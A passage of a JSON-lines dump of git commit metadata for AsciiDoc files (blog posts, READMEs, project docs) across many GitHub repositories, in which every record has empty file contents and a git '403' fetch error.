2017-05-28-Hello-World.adoc","repos":"macchandev\/macchandev.github.io,macchandev\/macchandev.github.io,macchandev\/macchandev.github.io,macchandev\/macchandev.github.io","old_file":"_posts\/2017-05-28-Hello-World.adoc","new_file":"_posts\/2017-05-28-Hello-World.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/macchandev\/macchandev.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"176fc20f5d3dd3ed613491f0951563a7f3f64f6e","subject":"Update 2017-09-06-Hello-World.adoc","message":"Update 2017-09-06-Hello-World.adoc","repos":"dvbnrg\/dvbnrg.github.io,dvbnrg\/dvbnrg.github.io,dvbnrg\/dvbnrg.github.io,dvbnrg\/dvbnrg.github.io","old_file":"_posts\/2017-09-06-Hello-World.adoc","new_file":"_posts\/2017-09-06-Hello-World.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/dvbnrg\/dvbnrg.github.io.git\/': The requested URL returned error: 
403\n","license":"mit","lang":"AsciiDoc"} {"commit":"34ad46ea931c041ae73d293cb26667c801aba67f","subject":"Update 2016-08-08-ECC-Review.adoc","message":"Update 2016-08-08-ECC-Review.adoc","repos":"cothan\/cothan.github.io,cothan\/cothan.github.io,cothan\/cothan.github.io,cothan\/cothan.github.io,cothan\/cothan.github.io","old_file":"_posts\/2016-08-08-ECC-Review.adoc","new_file":"_posts\/2016-08-08-ECC-Review.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/cothan\/cothan.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"021f34f84d60a1e080a889c3fba0e3d7dfd2c56f","subject":"add integration tests README","message":"add integration tests README\n","repos":"Yubico\/yubioath-desktop,Yubico\/yubioath-desktop,Yubico\/yubioath-desktop,Yubico\/yubioath-desktop,Yubico\/yubioath-desktop","old_file":"integration_test\/README.adoc","new_file":"integration_test\/README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/Yubico\/yubioath-desktop.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"e4a9e3f3bb0dc42d0f78d84bc59ada6b0639a9ae","subject":"Update 2016-08-29-HITB-Singapore-A-few-cryptography-challenge-writeups.adoc","message":"Update 2016-08-29-HITB-Singapore-A-few-cryptography-challenge-writeups.adoc","repos":"cothan\/cothan.github.io,cothan\/cothan.github.io,cothan\/cothan.github.io,cothan\/cothan.github.io,cothan\/cothan.github.io","old_file":"_posts\/2016-08-29-HITB-Singapore-A-few-cryptography-challenge-writeups.adoc","new_file":"_posts\/2016-08-29-HITB-Singapore-A-few-cryptography-challenge-writeups.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/cothan\/cothan.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"19e435ce4a817f161cab66c747107238923c8e6b","subject":"Update 2015-02-06-HubPress-a-web-application-to-build-static-blog-on-Github-gh-pages.adoc","message":"Update 2015-02-06-HubPress-a-web-application-to-build-static-blog-on-Github-gh-pages.adoc","repos":"HubPress\/blog.hubpress.io,HubPress\/blog.hubpress.io,luckypoem\/blog.hubpress.io,luckypoem\/blog.hubpress.io,HubPress\/blog.hubpress.io,HubPress\/blog.hubpress.io,luckypoem\/blog.hubpress.io,luckypoem\/blog.hubpress.io","old_file":"_posts\/2015-02-06-HubPress-a-web-application-to-build-static-blog-on-Github-gh-pages.adoc","new_file":"_posts\/2015-02-06-HubPress-a-web-application-to-build-static-blog-on-Github-gh-pages.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/HubPress\/blog.hubpress.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"9e654f8ddf72d2370d531704665080984c397500","subject":"Update pay-me.adoc","message":"Update pay-me.adoc","repos":"rorosaurus\/hubpress.io,rorosaurus\/hubpress.io,rorosaurus\/hubpress.io,rorosaurus\/hubpress.io","old_file":"_posts\/pay-me.adoc","new_file":"_posts\/pay-me.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/rorosaurus\/hubpress.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"25a7d9b03dd3d5460dc7bc09a382543f8f52af76","subject":"Initial commit","message":"Initial 
commit\n","repos":"jbake-org\/jbake-forge-addon,jbake-org\/jbake-forge-addon","old_file":"CONTRIBUTION.asciidoc","new_file":"CONTRIBUTION.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jbake-org\/jbake-forge-addon.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"1e80ecdd2549b5eeeda9d38bfc21257bf467edae","subject":"Update 2015-06-18-Hello-Word.adoc","message":"Update 2015-06-18-Hello-Word.adoc","repos":"miplayer1\/miplayer1.github.io,miplayer1\/miplayer1.github.io,miplayer1\/miplayer1.github.io","old_file":"_posts\/2015-06-18-Hello-Word.adoc","new_file":"_posts\/2015-06-18-Hello-Word.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/miplayer1\/miplayer1.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"fbfdf00254467b6bdeb11d8634a28a1d6bfc626c","subject":"Update 2015-06-18-hello-word.adoc","message":"Update 2015-06-18-hello-word.adoc","repos":"miplayer1\/miplayer1.github.io,miplayer1\/miplayer1.github.io,miplayer1\/miplayer1.github.io","old_file":"_posts\/2015-06-18-hello-word.adoc","new_file":"_posts\/2015-06-18-hello-word.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/miplayer1\/miplayer1.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"9c8d20d9f69d04f5f425f7fe9bfb9552ffb7dbe0","subject":"Update 2016-08-12-2016-08-11.adoc","message":"Update 2016-08-12-2016-08-11.adoc","repos":"tamakinkun\/tamakinkun.github.io,tamakinkun\/tamakinkun.github.io,tamakinkun\/tamakinkun.github.io,tamakinkun\/tamakinkun.github.io","old_file":"_posts\/2016-08-12-2016-08-11.adoc","new_file":"_posts\/2016-08-12-2016-08-11.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/tamakinkun\/tamakinkun.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"d6335ef3db94a01db1b0fa314f06e8606382bb69","subject":"Update 2016-10-31-First-post.adoc","message":"Update 2016-10-31-First-post.adoc","repos":"emilio2hd\/emilio2hd.github.io,emilio2hd\/emilio2hd.github.io,emilio2hd\/emilio2hd.github.io,emilio2hd\/emilio2hd.github.io","old_file":"_posts\/2016-10-31-First-post.adoc","new_file":"_posts\/2016-10-31-First-post.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/emilio2hd\/emilio2hd.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"baf0e9e853e69e046b1f30ec3bd058a845313bb9","subject":"Publish 2016-6-25-Git-one.adoc","message":"Publish 2016-6-25-Git-one.adoc","repos":"oppemism\/oppemism.github.io,oppemism\/oppemism.github.io,oppemism\/oppemism.github.io,oppemism\/oppemism.github.io","old_file":"2016-6-25-Git-one.adoc","new_file":"2016-6-25-Git-one.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/oppemism\/oppemism.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"934ab7bf727145cd5cc6fa4f7f02fc36640cb0b1","subject":"Update 2017-01-10-Fedora25-Synapse-and-Your-Display-Server.adoc","message":"Update 
2017-01-10-Fedora25-Synapse-and-Your-Display-Server.adoc","repos":"iamthinkking\/iamthinkking.github.io,iamthinkking\/iamthinkking.github.io,iamthinkking\/iamthinkking.github.io,iamthinkking\/iamthinkking.github.io","old_file":"_posts\/2017-01-10-Fedora25-Synapse-and-Your-Display-Server.adoc","new_file":"_posts\/2017-01-10-Fedora25-Synapse-and-Your-Display-Server.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/iamthinkking\/iamthinkking.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"c8f60b33f75b1480bbac2763453f7512a5afba1b","subject":"Update 2018-06-17-Introduction-of-Computational-Complexity.adoc","message":"Update 2018-06-17-Introduction-of-Computational-Complexity.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-06-17-Introduction-of-Computational-Complexity.adoc","new_file":"_posts\/2018-06-17-Introduction-of-Computational-Complexity.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"01394a5c478fd2e1fa0622b6104596eb2fbec6b0","subject":"Update 2016-02-14-Over-Rendering-with-Staggered-Alpha.adoc","message":"Update 2016-02-14-Over-Rendering-with-Staggered-Alpha.adoc","repos":"marksubbarao\/hubpress.io,marksubbarao\/hubpress.io,marksubbarao\/hubpress.io,marksubbarao\/hubpress.io","old_file":"_posts\/2016-02-14-Over-Rendering-with-Staggered-Alpha.adoc","new_file":"_posts\/2016-02-14-Over-Rendering-with-Staggered-Alpha.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/marksubbarao\/hubpress.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"56c159bc35919c58df6736f7a34515662345da04","subject":"add deref","message":"add deref\n","repos":"clojure\/clojure-site","old_file":"content\/news\/2021\/06\/11\/deref.adoc","new_file":"content\/news\/2021\/06\/11\/deref.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/clojure\/clojure-site.git\/': The requested URL returned error: 403\n","license":"epl-1.0","lang":"AsciiDoc"} {"commit":"4b64d560954f1c121f4dd7f0447f57de2432f8de","subject":"add deref","message":"add deref\n","repos":"clojure\/clojure-site","old_file":"content\/news\/2021\/08\/13\/deref.adoc","new_file":"content\/news\/2021\/08\/13\/deref.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/clojure\/clojure-site.git\/': The requested URL returned error: 403\n","license":"epl-1.0","lang":"AsciiDoc"} {"commit":"31bc134d26161e6952213a5ff22ff27834ca1ae9","subject":"Renamed '_posts\/2020-04-25-4-days-ago-i-joined-a-community-of-Makers.adoc' to '_posts\/2020-04-25-4-days-ago-i-joined-a-community-of-makers.adoc'","message":"Renamed '_posts\/2020-04-25-4-days-ago-i-joined-a-community-of-Makers.adoc' to 
'_posts\/2020-04-25-4-days-ago-i-joined-a-community-of-makers.adoc'","repos":"anthonny\/personal-blog,anthonny\/personal-blog,anthonny\/personal-blog,anthonny\/personal-blog","old_file":"_posts\/2020-04-25-4-days-ago-i-joined-a-community-of-makers.adoc","new_file":"_posts\/2020-04-25-4-days-ago-i-joined-a-community-of-makers.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/anthonny\/personal-blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"6e2ff79780505a09b4e87c39c8f0fbfaa6e15589","subject":"Mv Coffee","message":"Mv Coffee\n","repos":"oliviercailloux\/java-course,oliviercailloux\/java-course,oliviercailloux\/jee","old_file":"Objects & interfaces\/README.adoc","new_file":"Objects & interfaces\/README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/oliviercailloux\/jee.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"923fea57bd582df214caaf93757315ba38c9f58e","subject":"Update 2015-03-27-Chat.adoc","message":"Update 2015-03-27-Chat.adoc","repos":"hinaloe\/hubpress,hinaloe\/hubpress,hinaloe\/hubpress,hinaloe\/hubpress","old_file":"_posts\/2015-03-27-Chat.adoc","new_file":"_posts\/2015-03-27-Chat.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/hinaloe\/hubpress.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"84338d235d0a31e27c3a1e84ed9e84533b1ebacd","subject":"Update 2015-09-16-guat.adoc","message":"Update 2015-09-16-guat.adoc","repos":"maorodriguez\/maorodriguez.github.io,maorodriguez\/maorodriguez.github.io,maorodriguez\/maorodriguez.github.io","old_file":"_posts\/2015-09-16-guat.adoc","new_file":"_posts\/2015-09-16-guat.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/maorodriguez\/maorodriguez.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"e1fa7f3167d213f3d6e926864168afe30e3fea31","subject":"Update 2016-08-09-xiaocase2.adoc","message":"Update 2016-08-09-xiaocase2.adoc","repos":"oppemism\/oppemism.github.io,oppemism\/oppemism.github.io,oppemism\/oppemism.github.io,oppemism\/oppemism.github.io","old_file":"_posts\/2016-08-09-xiaocase2.adoc","new_file":"_posts\/2016-08-09-xiaocase2.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/oppemism\/oppemism.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"1e53bb5ddcc720b44706dc1a18ba0f851cb2ad04","subject":"Update 2016-12-22-Larastudy.adoc","message":"Update 2016-12-22-Larastudy.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2016-12-22-Larastudy.adoc","new_file":"_posts\/2016-12-22-Larastudy.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"49205046013ef81bc183df01db705affb98350d9","subject":"Added symbolic link of index.adoc","message":"Added symbolic link of 
index.adoc\n","repos":"spring-cloud\/spring-cloud-cloudfoundry,spring-cloud\/spring-cloud-cloudfoundry","old_file":"docs\/src\/main\/asciidoc\/index.adoc","new_file":"docs\/src\/main\/asciidoc\/index.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/spring-cloud\/spring-cloud-cloudfoundry.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"ccd6fc4c7961e8396ab249b45b3fa950de9dbc72","subject":"Update 1993-11-17.adoc","message":"Update 1993-11-17.adoc","repos":"oppemism\/oppemism.github.io,oppemism\/oppemism.github.io,oppemism\/oppemism.github.io,oppemism\/oppemism.github.io","old_file":"_posts\/1993-11-17.adoc","new_file":"_posts\/1993-11-17.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/oppemism\/oppemism.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"2573287923109ece30de5c9ec0cc0d29653f6ea5","subject":"Update 2016-11-14.adoc","message":"Update 2016-11-14.adoc","repos":"zhuo2015\/zhuo2015.github.io,zhuo2015\/zhuo2015.github.io,zhuo2015\/zhuo2015.github.io,zhuo2015\/zhuo2015.github.io","old_file":"_posts\/2016-11-14.adoc","new_file":"_posts\/2016-11-14.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/zhuo2015\/zhuo2015.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"d85f5e8e7e2d51f7945b161e0fc90bca2416729f","subject":"Symlink for Github.","message":"Symlink for Github.\n","repos":"Yubico\/u2fval-client-php","old_file":"examples\/README.adoc","new_file":"examples\/README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/Yubico\/u2fval-client-php.git\/': The requested URL returned error: 403\n","license":"bsd-2-clause","lang":"AsciiDoc"} {"commit":"dd923ce7b70f692ab9291df4a5f823e098e7609d","subject":"Update 2016-05-23-Blog-title.adoc","message":"Update 2016-05-23-Blog-title.adoc","repos":"parkowski\/parkowski.github.io,parkowski\/parkowski.github.io,parkowski\/parkowski.github.io,parkowski\/parkowski.github.io","old_file":"_posts\/2016-05-23-Blog-title.adoc","new_file":"_posts\/2016-05-23-Blog-title.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/parkowski\/parkowski.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"7b1374b7f62fcaac8e5603946d3a5c4dc0f031f1","subject":"Worked on documentation.","message":"Worked on documentation.\n","repos":"libyal\/winreg-kb,libyal\/winreg-kb","old_file":"documentation\/Task Scheduler Keys.asciidoc","new_file":"documentation\/Task Scheduler Keys.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/libyal\/winreg-kb.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"d511d8724922dfcac020904169161d3ac385d972","subject":"Added Batch Config eip base docs","message":"Added Batch Config eip base 
docs\n","repos":"objectiser\/camel,akhettar\/camel,rmarting\/camel,Fabryprog\/camel,akhettar\/camel,kevinearls\/camel,jamesnetherton\/camel,curso007\/camel,isavin\/camel,snurmine\/camel,alvinkwekel\/camel,pmoerenhout\/camel,alvinkwekel\/camel,curso007\/camel,snurmine\/camel,tdiesler\/camel,kevinearls\/camel,mcollovati\/camel,tadayosi\/camel,onders86\/camel,zregvart\/camel,gautric\/camel,sverkera\/camel,jonmcewen\/camel,gautric\/camel,onders86\/camel,punkhorn\/camel-upstream,snurmine\/camel,sverkera\/camel,CodeSmell\/camel,tadayosi\/camel,onders86\/camel,anoordover\/camel,snurmine\/camel,nicolaferraro\/camel,christophd\/camel,CodeSmell\/camel,kevinearls\/camel,ullgren\/camel,pmoerenhout\/camel,snurmine\/camel,apache\/camel,jamesnetherton\/camel,tdiesler\/camel,snurmine\/camel,anoordover\/camel,objectiser\/camel,jonmcewen\/camel,isavin\/camel,jamesnetherton\/camel,apache\/camel,curso007\/camel,sverkera\/camel,jonmcewen\/camel,nicolaferraro\/camel,tadayosi\/camel,akhettar\/camel,pax95\/camel,gautric\/camel,ullgren\/camel,CodeSmell\/camel,adessaigne\/camel,DariusX\/camel,zregvart\/camel,rmarting\/camel,tdiesler\/camel,dmvolod\/camel,gnodet\/camel,pax95\/camel,adessaigne\/camel,punkhorn\/camel-upstream,gnodet\/camel,CodeSmell\/camel,mcollovati\/camel,nikhilvibhav\/camel,isavin\/camel,pax95\/camel,tadayosi\/camel,davidkarlsen\/camel,tdiesler\/camel,anoordover\/camel,kevinearls\/camel,pax95\/camel,christophd\/camel,dmvolod\/camel,dmvolod\/camel,nikhilvibhav\/camel,pmoerenhout\/camel,christophd\/camel,jonmcewen\/camel,cunningt\/camel,pmoerenhout\/camel,gautric\/camel,nikhilvibhav\/camel,akhettar\/camel,adessaigne\/camel,nicolaferraro\/camel,tadayosi\/camel,tdiesler\/camel,alvinkwekel\/camel,rmarting\/camel,rmarting\/camel,Fabryprog\/camel,gautric\/camel,dmvolod\/camel,davidkarlsen\/camel,ullgren\/camel,gnodet\/camel,adessaigne\/camel,isavin\/camel,mcollovati\/camel,christophd\/camel,alvinkwekel\/camel,objectiser\/camel,cunningt\/camel,rmarting\/camel,anoordover\/camel,dmvolod\/camel,apache\/camel,christophd\/camel,onders86\/camel,jonmcewen\/camel,mcollovati\/camel,curso007\/camel,gnodet\/camel,dmvolod\/camel,adessaigne\/camel,apache\/camel,tadayosi\/camel,nikhilvibhav\/camel,anoordover\/camel,isavin\/camel,kevinearls\/camel,rmarting\/camel,ullgren\/camel,punkhorn\/camel-upstream,cunningt\/camel,pax95\/camel,Fabryprog\/camel,zregvart\/camel,cunningt\/camel,jonmcewen\/camel,anoordover\/camel,akhettar\/camel,jamesnetherton\/camel,pmoerenhout\/camel,akhettar\/camel,jamesnetherton\/camel,gnodet\/camel,nicolaferraro\/camel,zregvart\/camel,apache\/camel,christophd\/camel,DariusX\/camel,punkhorn\/camel-upstream,gautric\/camel,cunningt\/camel,objectiser\/camel,jamesnetherton\/camel,cunningt\/camel,curso007\/camel,davidkarlsen\/camel,sverkera\/camel,pax95\/camel,davidkarlsen\/camel,onders86\/camel,isavin\/camel,sverkera\/camel,Fabryprog\/camel,apache\/camel,pmoerenhout\/camel,adessaigne\/camel,onders86\/camel,DariusX\/camel,curso007\/camel,tdiesler\/camel,kevinearls\/camel,DariusX\/camel,sverkera\/camel","old_file":"camel-core\/src\/main\/docs\/eips\/batch-config-eip.adoc","new_file":"camel-core\/src\/main\/docs\/eips\/batch-config-eip.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/pax95\/camel.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"9fdf2b77c65cd18fa794cd7232e2ff71c3e0ea48","subject":"Update 2015-06-22-Documenter.adoc","message":"Update 
2015-06-22-Documenter.adoc","repos":"miplayer1\/miplayer1.github.io,miplayer1\/miplayer1.github.io,miplayer1\/miplayer1.github.io","old_file":"_posts\/2015-06-22-Documenter.adoc","new_file":"_posts\/2015-06-22-Documenter.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/miplayer1\/miplayer1.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"53f703fc3b83197f78043a8a79d5bda3e0ca2127","subject":"Update 2015-10-22-First-post.adoc","message":"Update 2015-10-22-First-post.adoc","repos":"csiebler\/hubpress-test,csiebler\/hubpress-test,csiebler\/hubpress-test","old_file":"_posts\/2015-10-22-First-post.adoc","new_file":"_posts\/2015-10-22-First-post.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/csiebler\/hubpress-test.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"a78b9f87bceb2dbf9dca0ac80d81e76f63ecbfc6","subject":"Update 2016-07-25-2016-07-25.adoc","message":"Update 2016-07-25-2016-07-25.adoc","repos":"tamakinkun\/tamakinkun.github.io,tamakinkun\/tamakinkun.github.io,tamakinkun\/tamakinkun.github.io,tamakinkun\/tamakinkun.github.io","old_file":"_posts\/2016-07-25-2016-07-25.adoc","new_file":"_posts\/2016-07-25-2016-07-25.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/tamakinkun\/tamakinkun.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"daef4599da91989a3a3a5b6727efad368a80a823","subject":"Updated README with end of life documentation","message":"Updated README with end of life documentation\n\nNecessary to close this project down in favor of using Pennyworth\ninstead.\n","repos":"bkuhlmann\/alfred","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/bkuhlmann\/alfred.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"02cd3e3d6dbdb38674e696e2b091210007e59783","subject":"y2b create post Beats By Dr. Dre Beats Pro Detox Edition Unboxing (HD)","message":"y2b create post Beats By Dr. 
Dre Beats Pro Detox Edition Unboxing (HD)","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2011-06-26-Beats-By-Dr-Dre-Beats-Pro-Detox-Edition-Unboxing-HD.adoc","new_file":"_posts\/2011-06-26-Beats-By-Dr-Dre-Beats-Pro-Detox-Edition-Unboxing-HD.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"f0b9f47c8199cc4e61a78b58589a0edee206d485","subject":"Update 2016-10-04-iOS-10-Remote-Notification.adoc","message":"Update 2016-10-04-iOS-10-Remote-Notification.adoc","repos":"dakeshi\/dakeshi.github.io,dakeshi\/dakeshi.github.io,dakeshi\/dakeshi.github.io,dakeshi\/dakeshi.github.io","old_file":"_posts\/2016-10-04-iOS-10-Remote-Notification.adoc","new_file":"_posts\/2016-10-04-iOS-10-Remote-Notification.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/dakeshi\/dakeshi.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"f3bf9fb32d15458776caca242105bac46d2ceea4","subject":"Update 2018-04-30-Pengalaman-Beli-dan-Rental-Film-di-i-Tunes.adoc","message":"Update 2018-04-30-Pengalaman-Beli-dan-Rental-Film-di-i-Tunes.adoc","repos":"lovian\/lovian.github.io,lovian\/lovian.github.io,lovian\/lovian.github.io,lovian\/lovian.github.io","old_file":"_posts\/2018-04-30-Pengalaman-Beli-dan-Rental-Film-di-i-Tunes.adoc","new_file":"_posts\/2018-04-30-Pengalaman-Beli-dan-Rental-Film-di-i-Tunes.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/lovian\/lovian.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"0d1cb50c7f7c3f01bcba6e77b544daea546b2bb5","subject":"Update 2017-01-31-Hello-everyone.adoc","message":"Update 2017-01-31-Hello-everyone.adoc","repos":"Adyrhan\/adyrhan.github.io,Adyrhan\/adyrhan.github.io,Adyrhan\/adyrhan.github.io,Adyrhan\/adyrhan.github.io","old_file":"_posts\/2017-01-31-Hello-everyone.adoc","new_file":"_posts\/2017-01-31-Hello-everyone.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/Adyrhan\/adyrhan.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"99a41b0f480be5aafc2bb2d4a3df58c78a02501f","subject":"Update 2017-05-08-Held-und-Genie.adoc","message":"Update 2017-05-08-Held-und-Genie.adoc","repos":"backemulus\/backemulus.github.io,backemulus\/backemulus.github.io,backemulus\/backemulus.github.io,backemulus\/backemulus.github.io","old_file":"_posts\/2017-05-08-Held-und-Genie.adoc","new_file":"_posts\/2017-05-08-Held-und-Genie.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/backemulus\/backemulus.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"8433a3b2e9cbdcf8ae884b93e3504af23cb5e6c0","subject":"Update 2017-12-18-P-H-Per-Golang.adoc","message":"Update 
2017-12-18-P-H-Per-Golang.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-12-18-P-H-Per-Golang.adoc","new_file":"_posts\/2017-12-18-P-H-Per-Golang.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"d603b46b6a3ff55be49d5a86a85e4f43952d2691","subject":"Fixed a typo","message":"Fixed a typo\n","repos":"ManoMarks\/labs,ManoMarks\/labs,ManoMarks\/labs,ManoMarks\/labs,ManoMarks\/labs,ManoMarks\/labs,ManoMarks\/labs,ManoMarks\/labs","old_file":"developer-tools\/java\/readme.adoc","new_file":"developer-tools\/java\/readme.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/ManoMarks\/labs.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"09c8017a657e4ac52700ff0fa6a399d2c5b9984c","subject":"Changed Saxon version number in documentation to 10.3","message":"Changed Saxon version number in documentation to 10.3\n","repos":"Armatiek\/xslweb,Armatiek\/xslweb,Armatiek\/xslweb,Armatiek\/xslweb","old_file":"docs\/XSLWeb Developer Manual.adoc","new_file":"docs\/XSLWeb Developer Manual.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/Armatiek\/xslweb.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"36d3f69ec8044b7c9910b2ae06303785e230c467","subject":"Update 2016-03-24-Microservices-in-the-Chronicle-world-Part-2.adoc","message":"Update 